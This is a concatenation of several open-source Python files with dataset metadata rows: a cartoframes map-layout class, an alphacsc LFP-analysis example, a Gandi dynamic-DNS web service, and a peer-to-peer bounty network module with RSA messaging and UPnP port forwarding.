"""Create a layout of visualizations in order to compare them.
Args:
maps (list of :py:class:`Map <cartoframes.viz.Map>`): List of
maps. Zero or more of :py:class:`Map <cartoframes.viz.Map>`.
        n_size (number, optional): Number of columns of the layout.
        m_size (number, optional): Number of rows of the layout.
viewport (dict, optional): Properties for display of the maps viewport.
Keys can be `bearing` or `pitch`.
is_static (boolean, optional): By default is False. All the maps in each visualization
are interactive. In order to set them static images for performance reasons
set `is_static` to True.
map_height (number, optional): Height in pixels for each visualization.
Default is 250.
full_height (boolean, optional): When a layout visualization is published, it
will fit the screen height. Otherwise, each visualization height will be
`map_height`. Default True.
Raises:
ValueError: if the input elements are not instances of :py:class:`Map <cartoframes.viz.Map>`.
Examples:
Basic usage.
>>> Layout([
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account'))
>>> ])
Display a 2x2 layout.
>>> Layout([
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account'))
>>> ], 2, 2)
Custom Titles.
>>> Layout([
... Map(Layer('table_in_your_account'), title="Visualization 1 custom title"),
    ... Map(Layer('table_in_your_account'), title="Visualization 2 custom title")
>>> ])
Viewport.
>>> Layout([
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account'))
>>> ], viewport={ 'zoom': 2 })
>>> Layout([
... Map(Layer('table_in_your_account'), viewport={ 'zoom': 0.5 }),
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account'))
>>> ], viewport={ 'zoom': 2 })
    Create a static layout.
>>> Layout([
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account'))
>>> ], is_static=True)
"""
def __init__(self,
maps,
n_size=None,
m_size=None,
viewport=None,
map_height=250,
full_height=True,
is_static=False,
**kwargs):
self._maps = maps
self._layout = _init_layout(self._maps, is_static, viewport)
self._n_size = n_size if n_size is not None else len(self._layout)
self._m_size = m_size if m_size is not None else constants.DEFAULT_LAYOUT_M_SIZE
self._viewport = viewport
self._is_static = is_static
self._map_height = map_height
self._full_height = full_height
self._publisher = None
self._carto_vl_path = kwargs.get('_carto_vl_path', None)
self._airship_path = kwargs.get('_airship_path', None)
def _repr_html_(self):
self._html_layout = HTMLLayout()
map_height = '100%' if self._full_height else '{}px'.format(self._map_height)
self._html_layout.set_content(
maps=self._layout,
size=['100%', self._map_height * self._m_size],
n_size=self._n_size,
m_size=self._m_size,
is_static=self._is_static,
map_height=map_height,
full_height=self._full_height,
_carto_vl_path=self._carto_vl_path,
_airship_path=self._airship_path
)
return self._html_layout.html
@send_metrics('map_published')
def publish(self, name, password, credentials=None, if_exists='fail', maps_api_key=None):
"""Publish the layout visualization as a CARTO custom visualization.
Args:
name (str): The visualization name on CARTO.
password (str): By setting it, your visualization will be protected by
password. When someone tries to show the visualization, the password
will be requested. To disable password you must set it to None.
credentials (:py:class:`Credentials <cartoframes.auth.Credentials>`, optional):
A Credentials instance. If not provided, the credentials will be automatically
obtained from the default credentials if available. It is used to create the
publication and also to save local data (if exists) into your CARTO account.
if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with
the same name already exists in your account. Default is 'fail'.
maps_api_key (str, optional): The Maps API key used for private datasets.
Example:
Publishing the map visualization.
>>> tlayout = Layout([
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account'))
>>> ])
>>> tlayout.publish('Custom Map Title', password=None)
"""
_credentials = get_credentials(credentials)
layers = []
for viz_map in self._maps:
for layer in viz_map.layers:
layers.append(layer)
self._publisher = _get_publisher(_credentials)
self._publisher.set_layers(layers, maps_api_key)
html = self._get_publication_html()
return self._publisher.publish(html, name, password, if_exists)
def update_publication(self, name, password, if_exists='fail'):
"""Update the published layout visualization.
Args:
name (str): The visualization name on CARTO.
            password (str): By setting it, your visualization will be protected by
                password. To make the visualization public, set it to None.
if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with the same name already
exists in your account. Default is 'fail'.
Raises:
PublishError: if the map has not been published yet.
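        Example:
            A minimal usage sketch, assuming `tlayout` is a Layout that was
            already published from this session with `publish`:
            >>> tlayout.update_publication('Custom Map Title', password=None)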
"""
html = self._get_publication_html()
return self._publisher.update(html, name, password, if_exists)
def _get_publication_html(self):
if not self._publisher:
_credentials = get_credentials(None)
self._publisher = _get_publisher(_credentials)
html_layout = HTMLLayout('templates/viz/main_layout.html.j2')
layers = self._publisher.get_layers()
layer_index = 0
for viz_map in self._maps:
for layer in viz_map.layers:
layer.credentials = layers[layer_index].credentials
layer_index += 1
maps = _init_layout(self._maps, self._is_static, self._viewport)
map_height = '100%' if self._full_height else '{}px'.format(self._map_height)
html_layout.set_content(
maps=maps,
size=['100%', self._map_height * self._m_size],
n_size=self._n_size,
m_size=self._m_size,
is_static=self._is_static,
is_embed=True,
map_height=map_height
)
return html_layout.html
def _init_layout(maps, is_static, viewport):
layout = []
for map_index, viz in enumerate(maps):
if not isinstance(viz, Map):
raise ValueError('All the elements in the Layout should be an instance of Map.')
viz.is_static = _get_is_static(viz.is_static, is_static)
viz.viewport = _get_viewport(viz.viewport, viewport)
viz.camera = _get_camera(viz.viewport)
for layer in viz.layers:
layer.map_index = map_index
layer.reset_ui(viz)
layout.append(viz.get_content())
return layout
def _get_viewport(map_settings_viewport, layout_viewport):
if map_settings_viewport is not None:
return map_settings_viewport
return layout_viewport
def _get_camera(viewport):
camera = None
if viewport is not None:
camera = {
'center': get_center(viewport),
'zoom': viewport.get('zoom'),
'bearing': viewport.get('bearing'),
'pitch': viewport.get('pitch')
}
return camera
def _get_is_static(map_settings_is_static, layout_is_static):
if map_settings_is_static is not None:
return map_settings_is_static
return layout_is_static
def _get_publisher(credentials):
return KuvizPublisher(credentials)
| bsd-3-clause | 7,968,791,184,678,179,000 | 36.090909 | 117 | 0.586104 | false |
alphacsc/alphacsc | examples/csc/plot_lfp_data.py | 1 | 3791 | """
==============================
CSC to learn LFP spiking atoms
==============================
Here, we show how CSC can be used to learn spiking
atoms from Local Field Potential (LFP) data [1].
[1] Hitziger, Sebastian, et al.
Adaptive Waveform Learning: A Framework for Modeling Variability in
Neurophysiological Signals. IEEE Transactions on Signal Processing (2017).
"""
###############################################################################
# First, let us fetch the data (~14 MB)
import os
from mne.utils import _fetch_file
url = ('https://github.com/hitziger/AWL/raw/master/Experiments/data/'
'LFP_data_contiguous_1250_Hz.mat')
fname = './LFP_data_contiguous_1250_Hz.mat'
if not os.path.exists(fname):
_fetch_file(url, fname)
###############################################################################
# It is a mat file, so we use scipy to load it
from scipy import io
data = io.loadmat(fname)
X, sfreq = data['X'].T, float(data['sfreq'])
###############################################################################
# And now let us look at the data
import numpy as np
import matplotlib.pyplot as plt
start, stop = 11000, 15000
times = np.arange(start, stop) / sfreq
plt.plot(times, X[0, start:stop], color='b')
plt.xlabel('Time (s)')
plt.ylabel(r'$\mu$ V')
plt.xlim([9., 12.])
###############################################################################
# and filter it using a convenient function from MNE. This will remove low
# frequency drifts, but we keep the high frequencies
from mne.filter import filter_data
X = filter_data(
X.astype(np.float64), sfreq, l_freq=1, h_freq=None, fir_design='firwin')
###############################################################################
# Now, we define the parameters of our model.
reg = 6.0
n_times = 2500
n_times_atom = 350
n_trials = 100
n_atoms = 3
n_iter = 60
###############################################################################
# Let's stick to one random state for now, but if you want to learn how to
# select the random state, consult :ref:`this example
# <sphx_glr_auto_examples_plot_simulate_randomstate.py>`.
random_state = 10
###############################################################################
# Now, we epoch the trials
overlap = 0
starts = np.arange(0, X.shape[1] - n_times, n_times - overlap)
stops = np.arange(n_times, X.shape[1], n_times - overlap)
X_new = []
for idx, (start, stop) in enumerate(zip(starts, stops)):
if idx >= n_trials:
break
X_new.append(X[0, start:stop])
X_new = np.vstack(X_new)
del X
###############################################################################
# We remove the mean and scale to unit variance.
X_new -= np.mean(X_new)
X_new /= np.std(X_new)
###############################################################################
# The convolutions can result in edge artifacts at the edges of the trials.
# Therefore, we discount the contributions from the edges by windowing the
# trials.
from numpy import hamming
X_new *= hamming(n_times)[None, :]
###############################################################################
# Of course, in a data-limited setting we want to use as much of the data as
# possible. If this is the case, you can set `overlap` to non-zero (for example
# half the epoch length).
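# For instance (a sketch, not executed in this example), a 50% overlap would only
# change the strides used when epoching above:
#
#     overlap = n_times // 2
#     starts = np.arange(0, X.shape[1] - n_times, n_times - overlap)
#     stops = np.arange(n_times, X.shape[1], n_times - overlap)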
#
# Now, we run regular CSC since the trials are not too noisy
from alphacsc import learn_d_z
pobj, times, d_hat, z_hat, reg = learn_d_z(X_new, n_atoms, n_times_atom,
reg=reg, n_iter=n_iter,
random_state=random_state, n_jobs=1)
###############################################################################
# Let's look at the atoms now.
plt.figure()
plt.plot(d_hat.T)
plt.show()
| bsd-3-clause | -4,877,237,652,640,226,000 | 34.101852 | 79 | 0.512002 | false |
AlessioCasco/gandi-dyndns | gandi-dyndns.py | 1 | 9763 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
gandi-dyndns
@author: AlessioCasco
"""
from bottle import route, run, request, response
from optparse import OptionParser
import logging as log
import xmlrpclib
import json
import sys
import re
gandi_fqdn_ip = {}
@route('/ping', method=['GET', 'POST'])
def ping():
'''Function for monitoring/ping'''
response.headers['Server'] = 'gandi-dyndns'
response.status = 200
    return "I'm alive!\n"
@route('/nic_update', method=['GET', 'POST'])
def gandi_dyndns():
'''Main function'''
response.headers['Server'] = 'gandi-dyndns'
    # dictionary gandi_fqdn_ip holds fqdn:ip pairs from all previous legitimate requests
    global gandi_fqdn_ip
    # dictionary new_fqdn_ip holds the fqdn:ip pair from the current request
new_fqdn_ip = {}
# define the action to perform into the gandi_api function
action = ''
try:
fqdn, new_ip, fqdn_match = fetch_parameters()
except TypeError:
response.status = 400
return
# create new dictionary with the info we got from the webserver
new_fqdn_ip[fqdn] = new_ip
# check if we need to fetch the ip from gandi
try:
if new_fqdn_ip[fqdn] != gandi_fqdn_ip[fqdn]:
log.debug('Received IP differs from the one saved on Gandi, will update it')
action = 'update'
gandi_fqdn_ip = gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action)
return
except KeyError:
log.debug('Do not know the current Gandi IP for fqdn %s, will fetch it' % fqdn)
try:
action = 'fetch'
gandi_fqdn_ip = gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action)
if new_fqdn_ip[fqdn] != gandi_fqdn_ip[fqdn]:
action = 'update'
gandi_fqdn_ip = gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action)
return
except ValueError:
response.status = 404
return
log.debug('Nothing to do, received IP is same as the one configured on gandi for %s' % fqdn)
return
def fetch_parameters():
'''Fetch parameters from the GET request'''
new_ip = ''
method = request.environ.get('REQUEST_METHOD')
# check for missing parameters
if not request.params.ip and not request.params.fqdn:
log.error('Received malformed request, both parameters (fqdn & ip) are missing. Got: \"%s\"' % request.url)
return
elif not request.params.ip:
new_ip = request.environ.get('REMOTE_ADDR')
log.debug('IP parameter is missing, will use client source one: %s' % new_ip)
elif not request.params.fqdn:
log.error('Received malformed request, fqdn parameter is missing. Got: \"%s\"' % request.url)
return
if not new_ip:
new_ip = request.params.ip
fqdn = request.params.fqdn
# check if parameters have correct informations
fqdn_match = re.match(r'^([a-zA-Z0-9][a-zA-Z0-9-]{1,61})\.([a-zA-Z0-9][a-zA-Z0-9-]{1,61}\.[a-zA-Z]{2,}$)', fqdn)
ip_match = re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', new_ip)
priv_ip_match = re.match(r'^(?:10|127|172\.(?:1[6-9]|2[0-9]|3[01])|192\.168)\..*', new_ip)
if not fqdn_match and not ip_match:
log.error('Received invalid values on both parameters. Got fqdn:\"%s\" & IP: %s' % (fqdn, new_ip))
return
elif not ip_match:
log.error('Received invalid ip value. Got %s' % new_ip)
return
elif priv_ip_match:
log.error('Received IP is not a public one. Got %s' % new_ip)
return
elif not fqdn_match:
log.error('Received invalid fqdn value. Got \"%s\"' % fqdn)
return
log.debug('Received %s request: fqdn:\"%s\" & IP: %s' % (method, fqdn, new_ip))
return fqdn, new_ip, fqdn_match
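# Illustrative request format (hypothetical host and values, for documentation
# only; the route itself is defined above as '/nic_update'):
#   GET http://<server>:<port>/nic_update?fqdn=home.example.com&ip=203.0.113.10
# If the `ip` parameter is omitted, the client's source address is used instead.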
def gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action):
'''Funcion for managing the Gandi API'''
# define some variables about gandi
api = xmlrpclib.ServerProxy('https://rpc.gandi.net/xmlrpc/')
apikey = config['apikey']
hostname = (fqdn_match.group(1))
domain = (fqdn_match.group(2))
# check if the domain is managed by the apikey provided
if not (api.domain.list(apikey, {'~fqdn': domain})):
log.error('Apikey provided does not manage %s domain' % domain)
raise ValueError('Apikey provided does not manage %s domain' % domain)
# check available zones
zones = api.domain.zone.list(apikey)
for zone in zones:
if (zone['name']) == domain:
zone_id = zone['id']
log.debug('Zone id %s found, for domain %s' % (zone_id, domain))
break
else:
log.error('Could not find zone file called %s, you must have a zone having same name as the domain you want to manage' % domain)
raise ValueError('Could not find zone file called %s, you must have a zone having same name as the domain you want to manage' % domain)
# check if we have to fetch the gandi api
if action == 'fetch':
# check & retrieve informations from recods in zone
records = api.domain.zone.record.list(apikey, zone_id, 0)
for record in records:
if (record['name'] == hostname and record['type'].lower() == 'a'):
# add fqdn/ip to the gandi_fqdn_ip dictionary
gandi_fqdn_ip[fqdn] = record['value']
log.debug('DNS \'A\' record found for subdomain \'%s\' having value %s' % (hostname, gandi_fqdn_ip[fqdn]))
break
else:
log.error('Unable to find a DNS \'A\' record for subdomain \'%s\'' % hostname)
raise ValueError('Unable to find a DNS \'A\' record for subdomain \'%s\'' % hostname)
return gandi_fqdn_ip
# check if we have to update the the ip
elif action == 'update':
# create a new zone from the existing one
zone_version = api.domain.zone.version.new(apikey, zone_id)
log.debug('New zone created, new version: %s' % zone_version)
# delete the A record from the new version
api.domain.zone.record.delete(apikey, zone_id, zone_version, {"type": ["A"], "name": [hostname]})
log.debug('Deleted \'A\' record from new zone version %s' % zone_version)
# add the A record we want
new_record = api.domain.zone.record.add(apikey, zone_id, zone_version, {"type": "A", "name": hostname, "value": new_fqdn_ip[fqdn], "ttl": 300})
log.debug('New \'A\' record added as follow: %s' % new_record)
# active the new zone version
if api.domain.zone.version.set(apikey, zone_id, zone_version):
            log.info('New IP %s for fqdn %s updated successfully.' % (new_fqdn_ip[fqdn], fqdn))
else:
log.error('Unable to update IP %s for fqdn %s' % (new_fqdn_ip[fqdn], fqdn))
return
# update gandi_fqdn_ip with the value just saved in the new zone version
gandi_fqdn_ip[fqdn] = new_fqdn_ip[fqdn]
return gandi_fqdn_ip
def init_application():
def get_options():
'''Load options from the command line'''
default_config = "config.json"
parser = OptionParser(usage="usage: %prog [options]")
parser.add_option(
"-c",
"--config",
dest="configfile",
default=default_config,
help='Config file relative or absolute path. Default is %s' % default_config)
(options, args) = parser.parse_args()
if options.configfile is not None:
options.configfile = options.configfile.strip(' ')
return options
def read_config_file(configfile):
'''Loads the config file from disk'''
try:
with open(configfile) as f:
config = validate_config(json.load(f))
return config
# catch if file doesn't exist
except IOError:
print('Config file %s not found' % configfile)
sys.exit(1)
# catch if json file is not formatted corectly
except ValueError:
print('Json file is not formatted properly')
sys.exit(1)
def validate_config(raw_config):
'''Checks the config file.'''
        # check if the required parameters are present inside the config
if 'port' not in raw_config or 'bind' not in raw_config or 'apikey' not in raw_config or 'logging' not in raw_config:
print('Config file has missing parameters')
sys.exit(1)
else:
return raw_config
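    # Illustrative config.json layout (all values are examples only; see the
    # README for the accepted log_level names):
    #   {
    #       "bind": "0.0.0.0",
    #       "port": 8080,
    #       "apikey": "your-gandi-api-key",
    #       "logging": {
    #           "log_enable": "true",
    #           "log_file": "gandi-dyndns.log",
    #           "log_level": "INFO"
    #       }
    #   }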
def configure_logging(config):
'''Configure logging'''
if config['logging']['log_enable'] == "false":
log.disable('CRITICAL')
return
elif config['logging']['log_enable'] == "true":
try:
log.basicConfig(
format='%(asctime)-15s [%(levelname)s] %(message)s',
filename=config['logging']['log_file'],
level=config['logging']['log_level'])
except ValueError:
print('Log level is not set with a correct value, check the README.md for the full list')
sys.exit(1)
except IOError:
print('Unable to create the log file, check if gandi-dyndns has write permissions')
sys.exit(1)
return
else:
            print('Bad config file: log_enable is not set to a correct value; (true|false) are the only two options')
sys.exit(1)
options = get_options()
config = read_config_file(options.configfile)
configure_logging(config)
return config
if __name__ == "__main__":
config = init_application()
# init webserver
run(host=config["bind"], port=config["port"], quiet=True)
| mit | -3,330,188,730,535,708,700 | 40.021008 | 151 | 0.597767 | false |
gappleto97/Senior-Project | common/peers.py | 1 | 16088 | from multiprocessing import Queue
import multiprocessing, os, pickle, select, socket, sys, time, rsa, traceback
from common.safeprint import safeprint
from common.bounty import *
global ext_port
global ext_ip
global port
global myPriv
global myPub
global propQueue
ext_port = -1
ext_ip = ""
port = 44565
myPub, myPriv = rsa.newkeys(1024)
propQueue = multiprocessing.Queue()
seedlist = [("127.0.0.1", 44565), ("localhost", 44565),
("10.132.80.128", 44565)]
peerlist = [("24.10.111.111", 44565)]
remove = []
bounties = []
# constants
peers_file = "data" + os.sep + "peerlist.pickle"
key_request = "Key Request".encode('utf-8')
close_signal = "Close Signal".encode("utf-8")
peer_request = "Requesting Peers".encode("utf-8")
bounty_request = "Requesting Bounties".encode("utf-8")
incoming_bounties = "Incoming Bounties".encode("utf-8")
incoming_bounty = "Incoming Bounty".encode("utf-8")
valid_signal = "Bounty was valid".encode("utf-8")
invalid_signal = "Bounty was invalid".encode("utf-8")
end_of_message = "End of message".encode("utf-8")
sig_length = len(max(
close_signal, peer_request, bounty_request, incoming_bounties,
incoming_bounty, valid_signal, invalid_signal, key=len))
def pad(string):
return string + " ".encode('utf-8') * (sig_length - (((len(string) - 1) % sig_length) + 1))
close_signal = pad(close_signal)
peer_request = pad(peer_request)
bounty_request = pad(bounty_request)
incoming_bounties = pad(incoming_bounties)
incoming_bounty = pad(incoming_bounty)
valid_signal = pad(valid_signal)
invalid_signal = pad(invalid_signal)
end_of_message = pad(end_of_message)
signals = [close_signal, peer_request, bounty_request, incoming_bounty, valid_signal, invalid_signal]
def send(msg, conn, key):
while key is None:
safeprint("Key not found. Requesting key")
conn.send(key_request)
try:
key = pickle.loads(conn.recv(1024))
key = rsa.PublicKey(key[0], key[1])
safeprint("Key received")
except EOFError:
continue
if not isinstance(msg, type("a".encode('utf-8'))):
msg = msg.encode('utf-8')
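    # RSA-1024 with PKCS#1 v1.5 padding can encrypt at most 117 bytes per block,
    # so the message is sent in 117-byte chunks, terminated by the end_of_message
    # marker that recv() watches for.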
x = 0
while x < len(msg) - 117:
conn.sendall(rsa.encrypt(msg[x:x+117], key))
x += 117
conn.sendall(rsa.encrypt(msg[x:], key))
conn.sendall(rsa.encrypt(end_of_message, key))
return key
def recv(conn):
received = "".encode('utf-8')
a = ""
try:
while True:
a = conn.recv(128)
if a == key_request:
safeprint("Key requested. Sending key")
conn.sendall(pickle.dumps((myPriv.n, myPriv.e), 0))
continue
a = rsa.decrypt(a, myPriv)
safeprint("Packet = " + str(a), verbosity=3)
if a == end_of_message:
return received
received += a
except rsa.pkcs1.DecryptionError as error:
safeprint("Decryption error---Content: " + str(a))
return "".encode('utf-8')
def get_lan_ip():
"""Retrieves the LAN ip. Expanded from http://stackoverflow.com/a/28950776"""
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('8.8.8.8', 23))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
def getFromFile():
"""Load peerlist from a file"""
if os.path.exists(peers_file):
try:
peerlist.extend(pickle.load(open(peers_file, "rb")))
trimPeers()
except:
safeprint("Could not load peerlist from file")
def saveToFile():
"""Save peerlist to a file"""
if not os.path.exists(peers_file.split(os.sep)[0]):
os.mkdir(peers_file.split(os.sep)[0])
pickle.dump(peerlist[:], open(peers_file, "wb"), 0)
def getFromSeeds():
"""Make peer requests to each address on the seedlist"""
for seed in seedlist:
safeprint(seed, verbosity=1)
peerlist.extend(requestPeerlist(seed))
time.sleep(1)
def requestPeerlist(address):
"""Request the peerlist of another node. Currently has additional test commands"""
conn = socket.socket()
conn.settimeout(5)
safeprint(address, verbosity=1)
try:
conn.connect(address)
key = send(peer_request, conn, None)
received = recv(conn)
safeprint(pickle.loads(received), verbosity=2)
if recv(conn) == peer_request:
handlePeerRequest(conn, False, key=key, received=pickle.loads(received))
recv(conn)
conn.close()
return pickle.loads(received)
except Exception as error:
safeprint("Failed:" + str(type(error)))
safeprint(error)
remove.extend([address])
return []
def requestBounties(address):
"""Request the bountylist of another node"""
conn = socket.socket()
conn.settimeout(5)
safeprint(address, verbosity=1)
try:
conn.connect(address)
key = send(bounty_request, conn, None)
received = recv(conn)
if recv(conn) == bounty_request:
handleBountyRequest(conn, False, key=key, received=pickle.loads(received))
safeprint(recv(conn))
conn.close()
addBounties(pickle.loads(received))
except Exception as error:
safeprint("Failed:" + str(type(error)))
safeprint(error)
remove.extend([address])
def initializePeerConnections(newPort, newip, newport):
"""Populate the peer list from a previous session, seeds, and from the peer list if its size is less than 12. Then save this new list to a file"""
    port = newPort  # NOTE: rebinds a local name only; the module-level `port` is not changed
    ext_ip = newip  # NOTE: local only -- without a `global` statement the global `ext_ip` keeps its value
    ext_port = newport  # NOTE: local only; the global `ext_port` keeps its value
safeprint([ext_ip, ext_port])
getFromFile()
safeprint("peers fetched from file", verbosity=1)
getFromSeeds()
safeprint("peers fetched from seedlist", verbosity=1)
trimPeers()
if len(peerlist) < 12:
safeprint(len(peerlist))
newlist = []
for peer in peerlist:
newlist.extend(requestPeerlist(peer))
peerlist.extend(newlist)
trimPeers()
safeprint("getting bounties from peers and seeds", verbosity=1)
for peer in peerlist[:] + seedlist[:]:
requestBounties(peer)
safeprint("peer network extended", verbosity=1)
saveToFile()
safeprint("peer network saved to file", verbosity=1)
safeprint(peerlist)
safeprint([ext_ip, ext_port])
def trimPeers():
"""Trim the peerlist to a single set, and remove any that were marked as erroneous before"""
temp = list(set(peerlist[:]))
for peer in remove:
try:
del temp[temp.index(peer)]
except:
continue
del remove[:]
del peerlist[:]
peerlist.extend(temp)
def listen(port, outbound, q, v, serv):
"""BLOCKING function which should only be run in a daemon thread. Listens and responds to other nodes"""
if serv:
from server.bounty import verify, addBounty
server = socket.socket()
server.bind(("0.0.0.0", port))
server.listen(10)
server.settimeout(5)
if sys.version_info[0] < 3 and sys.platform == "win32":
server.setblocking(True)
global ext_ip, ext_port
if outbound is True:
safeprint("UPnP mode is disabled")
else:
safeprint("UPnP mode is enabled")
if not portForward(port):
outbound = True
safeprint([outbound, ext_ip, ext_port])
q.put([outbound, ext_ip, ext_port])
while v.value: # is True is implicit
safeprint("listening on " + str(get_lan_ip()) + ":" + str(port), verbosity=3)
if not outbound:
safeprint("forwarded from " + ext_ip + ":" + str(ext_port), verbosity=3)
try:
conn, addr = server.accept()
server.setblocking(True)
conn.setblocking(True)
safeprint("connection accepted")
packet = recv(conn)
safeprint("Received: " + packet.decode(), verbosity=3)
key = None
if packet == peer_request:
key = handlePeerRequest(conn, True, key=key)
elif packet == bounty_request:
key = handleBountyRequest(conn, True, key=key)
elif packet == incoming_bounty:
key = handleIncomingBounty(conn, key=key)
send(close_signal, conn, key)
conn.close()
server.settimeout(5)
safeprint("connection closed")
except Exception as error:
safeprint("Failed: " + str(type(error)))
safeprint(error)
traceback.print_exc()
def handlePeerRequest(conn, exchange, key=None, received=[]):
"""Given a socket, send the proper messages to complete a peer request"""
if ext_port != -1:
unfiltered = peerlist[:] + [((ext_ip, ext_port), myPub.n, myPub.e)]
    else:
        unfiltered = peerlist[:]
filtered = list(set(unfiltered) - set(received))
safeprint("Unfiltered: " + str(unfiltered), verbosity=3)
safeprint("Filtered: " + str(filtered), verbosity=3)
toSend = pickle.dumps(filtered, 0)
safeprint("Sending")
key = send(toSend, conn, key)
if exchange:
send(peer_request, conn, key)
received = recv(conn)
safeprint("Received exchange", verbosity=1)
safeprint(pickle.loads(received), verbosity=3)
peerlist.extend(pickle.loads(received))
trimPeers()
return key
def handleBountyRequest(conn, exchange, key=None, received=[]):
"""Given a socket, send the proper messages to complete a bounty request"""
unfiltered = getBountyList()
filtered = list(set(unfiltered) - set(received))
toSend = pickle.dumps(filtered, 0)
safeprint("Sending")
key = send(toSend, conn, key)
if exchange:
send(bounty_request, conn, key)
received = recv(conn)
safeprint("Received exchange")
try:
safeprint(pickle.loads(received), verbosity=2)
bounties = pickle.loads(received)
valids = addBounties(bounties)
toSend = []
for i in range(len(bounties)):
if valids[i] >= 0: # If the bounty is valid and not a duplicate, add it to propagation list
toSend.append(bounties[i])
propQueue.put((incoming_bounties, toSend))
except Exception as error:
safeprint("Could not add bounties")
safeprint(type(error))
traceback.print_exc()
# later add function to request without charity bounties
return key
def handleIncomingBounty(conn, key=None):
"""Given a socket, store an incoming bounty & report it valid or invalid"""
received = recv(conn)
safeprint("Adding bounty: " + received.decode())
try:
valid = addBounty(received)
if valid >= -1: # If valid, even if a duplicate, send valid signal
safeprint("Sending valid signal")
send(valid_signal, conn, key)
if valid >= 0: # If valid and not already received, propagate
propQueue.put((incoming_bounty, received))
else:
send(invalid_signal, conn, key)
except Exception as error:
send(invalid_signal, conn, key)
safeprint("Incoming failed: " + str(type(error)))
safeprint(error)
traceback.print_exc()
return key
def propagate(tup):
try:
conn = socket.socket()
address = tup[1]
conn.connect(address)
key = send(incoming_bounty, conn, None)
send(pickle.dumps(tup[0], 0), conn, key)
recv(conn)
conn.close()
    except socket.error:
safeprint("Connection to " + str(address) + " failed; cannot propagate")
def portForward(port):
"""Attempt to forward a port on your router to the specified local port. Prints lots of debug info."""
try:
import miniupnpc
u = miniupnpc.UPnP(None, None, 200, port)
# Begin Debug info
safeprint('inital(default) values :')
safeprint(' discoverdelay' + str(u.discoverdelay))
safeprint(' lanaddr' + str(u.lanaddr))
safeprint(' multicastif' + str(u.multicastif))
safeprint(' minissdpdsocket' + str(u.minissdpdsocket))
safeprint('Discovering... delay=%ums' % u.discoverdelay)
safeprint(str(u.discover()) + 'device(s) detected')
# End Debug info
u.selectigd()
global ext_ip
ext_ip = u.externalipaddress()
safeprint("external ip is: " + str(ext_ip))
for i in range(0, 20):
try:
safeprint("Port forward try: " + str(i), verbosity=1)
if u.addportmapping(port+i, 'TCP', get_lan_ip(), port, 'Bounty Net', ''):
global ext_port
ext_port = port + i
safeprint("External port is " + str(ext_port))
return True
except Exception as error:
safeprint("Failed: " + str(type(error)))
safeprint(error)
except Exception as error:
safeprint("Failed: " + str(type(error)))
safeprint(error)
return False
def listenp(port, v):
"""BLOCKING function which should only be run in a daemon thread. Listens and responds to other nodes"""
import time
while v.value: # is True is implicit
safeprint("listenp-ing", verbosity=3)
try:
while propQueue.empty() and v.value:
time.sleep(0.01)
packet = propQueue.get()
safeprint("Received: " + str(packet), verbosity=3)
if packet[0] == incoming_bounty:
bounty = pickle.loads(packet[1])
if bounty.isValid():
from multiprocessing.pool import ThreadPool
ThreadPool().map(propagate, [(bounty, x) for x in peerlist[:]])
elif packet[0] == incoming_bounties:
for bounty in packet[1]:
if bounty.isValid():
from multiprocessing.pool import ThreadPool
ThreadPool().map(propagate, [(bounty, x) for x in peerlist[:]])
safeprint("Packet processed")
except Exception as error:
safeprint("Failed: " + str(type(error)))
safeprint(error)
def sync(items):
if items.get('config'):
from common import settings
settings.config = items.get('config')
if items.get('peerList'):
global peerlist
        peerlist = items.get('peerList')
if items.get('bountyList'):
from common import bounty
bounty.bountyList = items.get('bountyList')
if items.get('bountyLock'):
from common import bounty
bounty.bountyLock = items.get('bountyLock')
if items.get('propQueue'):
global propQueue
propQueue = items.get('propQueue')
class listener(multiprocessing.Process): # pragma: no cover
"""A class to deal with the listener method"""
def __init__(self, port, outbound, q, v, serv):
multiprocessing.Process.__init__(self)
self.outbound = outbound
self.port = port
self.q = q
self.v = v
self.serv = serv
def run(self):
safeprint("listener started")
sync(self.items)
listen(self.port, self.outbound, self.q, self.v, self.serv)
safeprint("listener stopped")
class propagator(multiprocessing.Process): # pragma: no cover
"""A class to deal with the listener method"""
def __init__(self, port, v):
multiprocessing.Process.__init__(self)
self.port = port
self.v = v
def run(self):
safeprint("propagator started")
sync(self.items)
listenp(self.port, self.v)
safeprint("propagator stopped")
| mit | -2,676,792,061,939,969,500 | 34.203501 | 150 | 0.599018 | false |